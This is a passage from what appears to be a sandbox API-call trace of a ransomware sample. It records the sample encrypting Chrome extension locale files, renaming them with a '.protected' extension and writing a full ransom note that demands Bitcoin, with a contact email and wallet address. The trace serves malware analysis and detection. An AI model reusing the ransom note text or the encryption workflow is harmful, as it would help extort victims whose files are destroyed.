returned 155 [0078.933] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.933] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.933] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.933] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json") returned 155 [0078.935] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json") returned 155 [0078.935] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json") returned 155 [0078.935] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.935] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0078.935] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.935] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0078.936] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.936] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.936] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.936] CloseHandle (hObject=0x168) returned 1 [0078.936] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.protected") returned 165 [0078.936] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.protected")) returned 1 [0078.938] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.938] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.938] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\RESTORE_FILES.txt") returned 159 [0078.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.938] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.938] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.939] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.939] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.939] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.939] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.939] CloseHandle (hObject=0x164) returned 1 [0078.939] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.939] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0078.939] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0078.939] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0078.939] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0078.939] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0078.939] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el") returned 141 [0078.939] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0078.939] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0078.939] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\*") returned 143 [0078.939] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.940] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.940] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.940] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.940] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.940] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.940] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\.") returned 143 [0078.940] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.940] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.940] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.940] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.940] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.940] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.940] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.940] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\..") returned 144 [0078.940] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.940] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.940] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.940] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0078.940] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.940] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.940] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.940] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.940] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json") returned 155 [0078.940] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.940] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.940] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.940] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json") returned 155 [0078.941] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json") returned 155 [0078.941] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json") returned 155 [0078.941] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.941] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0078.942] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.942] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0078.942] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.942] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.942] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.942] CloseHandle (hObject=0x168) returned 1 [0078.943] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.protected") returned 165 [0078.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.protected")) returned 1 [0078.943] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.943] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.944] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\RESTORE_FILES.txt") returned 159 [0078.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.944] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.944] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.945] lstrlenA (lpString="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") returned 684 [0078.945] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.945] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.945] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.945] CloseHandle (hObject=0x164) returned 1 [0078.945] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.945] lstrcmpiW (lpString1="en_GB", lpString2="Windows") returned -1 [0078.945] lstrcmpiW (lpString1="en_GB", lpString2="Program Files") returned -1 [0078.945] lstrcmpiW (lpString1="en_GB", lpString2="Program Files (x86)") returned -1 [0078.945] lstrcmpiW (lpString1="en_GB", lpString2="$Recycle.bin") returned 1 [0078.945] lstrcmpiW (lpString1="en_GB", lpString2="System Volume Information") returned -1 [0078.945] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB") returned 144 [0078.945] lstrcmpW (lpString1="en_GB", lpString2=".") returned 1 [0078.945] lstrcmpW (lpString1="en_GB", lpString2="..") returned 1 [0078.945] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\*") returned 146 [0078.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.946] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.946] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.946] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.946] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.946] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.946] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\.") returned 146 [0078.946] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.946] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.946] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.946] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.946] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.946] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.946] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.946] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\..") returned 147 [0078.946] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.946] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.946] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.946] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned 
-1 [0078.946] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.946] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.946] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.946] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.946] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0078.946] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.946] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.946] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.946] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.948] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0078.948] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 
